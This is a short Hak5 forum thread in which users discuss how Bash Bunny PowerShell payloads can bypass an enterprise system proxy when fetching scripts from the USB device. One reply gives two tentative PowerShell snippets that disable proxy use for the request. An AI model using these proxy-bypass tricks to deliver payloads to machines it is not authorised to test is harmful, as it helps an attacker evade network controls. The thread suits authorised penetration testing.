Jump to content
Hak5 Forums
cyb3rwr3ck

Dealing with powershell and proxies in payloads

Recommended Posts

Hi there,

I was wondering how the powershell based bunny payloads that load powershell-script-files from either the smb or the webservice of the bunny could circumvent the system wide proxy. The problem is that the proxy - obviously - is unable to connect to the bunny-IP and the payload fails. The current versions of the payloads does not seem to take this into account. The expected behaviour should be to ignore the system proxy during the initial request to the bunny and to use it in all other requests which is powershell default.

I am currently unaware of a good solution to circumvent a system wide proxy in powershell, especially without local admin.

Any ideas?

Best regards!

F

Share this post


Link to post
Share on other sites

Have not tried doing network stuff with the bunny with a proxy setting in play.  By default doesn't the proxy only get used for stuff leaving the local network or am I missing something and there is a way to make a machine use the proxy for every kind of network traffic, including local?

If it is the first, I don't think the proxy setting will get in the way of the bunny since the interface for it will come up as a local network (NIC and remote device "Bunny" are on the same subnet).

 

Anyone else wanna correct?  This is all speculation here.

Share this post


Link to post
Share on other sites
17 hours ago, PoSHMagiC0de said:

By default doesn't the proxy only get used for stuff leaving the local network or am I missing something and there is a way to make a machine use the proxy for every kind of network traffic, including local?

The thing is that the bunny presents a Network to the Host during this kind of "bring your own network attack". So the proxy is utilized as long as there is no "direct" exception for exactly this bunny network configuration. This will create a connect request to the explicit proxy which dies...

The only thing that should fix this behavior is enforcing this kind of direct request which - in an enterprise setup - is usually done by pac files. I have no idea how to do it temporarily using powershell so this is the goal to achieve.

Share this post


Link to post
Share on other sites

Yeah, that is a tuff one.  I do not have a setup to test that but I know powershell has a method to bypass proxy.

Try these 2 ways.  Both are Powershell.

#If you use invoke-webrequest

Invoke-Webrequest -URI "Bashbunny uri" -NoProxy

#If using old school webclient. Use before making request.
[System.Net.GlobalProxySelection]::Select = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()

 

Do not know if these will work but worth a try.

 

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now


  • Recently Browsing   0 members

    No registered users viewing this page.

×